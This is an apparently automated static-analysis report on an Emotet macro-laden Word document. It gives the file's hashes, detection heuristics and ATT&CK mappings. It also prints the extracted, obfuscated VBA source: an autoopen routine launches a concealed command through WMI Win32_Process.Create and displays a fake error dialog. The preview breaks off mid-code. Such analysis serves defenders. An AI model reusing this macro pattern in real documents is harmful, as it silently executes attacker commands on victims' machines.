Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 dc965c59d5c95961…

MALICIOUS

Office (OLE)

195.7 KB Created: 2019-12-03 17:40:00 Authoring application: Microsoft Office Word First seen: 2020-08-10
MD5: be7a781b5a90768ce8fdd9e937b8e933 SHA-1: 93abd5ae9771367d7233aabe289a14bd6232ca26 SHA-256: dc965c59d5c95961f10ce0d40addbbf5d7e601cf6bf242198ae3bebd5d559d2d
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

This document contains VBA macros, including an AutoOpen macro, that are designed to execute malicious code. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the use of WMI to launch a process, a common technique for downloading and executing secondary payloads. The ClamAV detection explicitly names this as Emotet, a known downloader family.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7428131-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7428131-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7909 bytes
SHA-256: bca5c5c437b6d7956698bced56982c87a2ece38786c8534a4ab03b778cf74a46
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Mfglgnexo"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Idgdcnpxc, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Ysjqteerugqe, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Hxfofvto, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Npmkhzuc, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Ajoajxyurj, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Zkyhduqo, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yjzrbmvogba, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Dshidbkil, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Jkhojoyxq, 8, 8, MSForms, TextBox"
Attribute VB_Control = "Vkahabklhsoj, 9, 9, MSForms, TextBox"
Attribute VB_Control = "Ovbjvjknac, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Qcqpeixq, 11, 11, MSForms, TextBox"

Attribute VB_Name = "Oktiuvyfn"
Attribute VB_Base = "0{7675A59C-DCB7-456A-AFC5-678C91677333}{0C5728AD-2192-42B4-A7C8-0BCEADC2CAAF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Nplxobalb"
Function Tmjkyjecuhiw()
On Error Resume Next
   Set Okkopymlha = Jinltwjlwd
If Bqzqxgsouoo Or Itnfizag Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Kwthifznl = Mzzwoaipqvuo
End If
CreateObject("winmgmts:Win32_Process").Create Nplxobalb.Ksixgikmdyuq, Gbyhelspxwc, Rlzjypbiogrls
   Set Hlxtkxrz = Hxcwhaervw
If Pythtutpcnf Or Hivhbdzvlug Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Twxhfgssw = Ddxfcguszizsj
End If
Oaxdmnmtkpjym = MsgBox(("Critical Error Encountered"), ("16"), Oktiuvyfn.Mbikshuquzyby)
   Set Nvikfvbsozqx = Oevoognrhko
If Dsoefshqcfic Or Fhmnabyu Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Uxcfwnyvkb = Zukekalz
End If
End Function
Sub autoopen()
On Error Resume Next
   Set Aqqokhzgj = Rznnzulogoq
If Pwhbxdyymvu Or Nqvumsgmic Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Skwizrkibyn = Jftofdskqgusm
End If
   Set Swrbtuoaoy = Pxskkeyt
If Czmrdsufyh Or Hdwwtoihxovy Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Soehvtai = Ocrwgizwayqo
End If
   Set Epgygpah = Ecuzqkcxjxx
If Lsdcwxokvn Or Uzwhjaqu Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Xsvnzscpvg = Vfcndjrdj
End If
Tmjkyjecuhiw
End Sub
Function Rlzjypbiogrls()
On Error Resume Next
   Set Wirwmlzl = Znxajevzuxdal
If Crnbzjanydy Or Zmjfgmwc Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 * Sin(zNGv3aM)))
      Loop
      gWAy656o3 = Cos(OMl)
      ElseIf ZgfHJ Eqv 470086876 Then
      zpUL19g6 = uDl
      Bangrryvw = Jtmkfnzaz
End If
Jqexsforylof = "winmgmts:Win32_Process"
   Set Fixmiwkhp = Yvhtxxvmviwkn
If Fucmrnxjej Or Fuullxlkdowtz Then
      Do While nEUFim > CxZxJD6
         VLjY49J0 = (8 / 106083443 + (270670809 
... (truncated)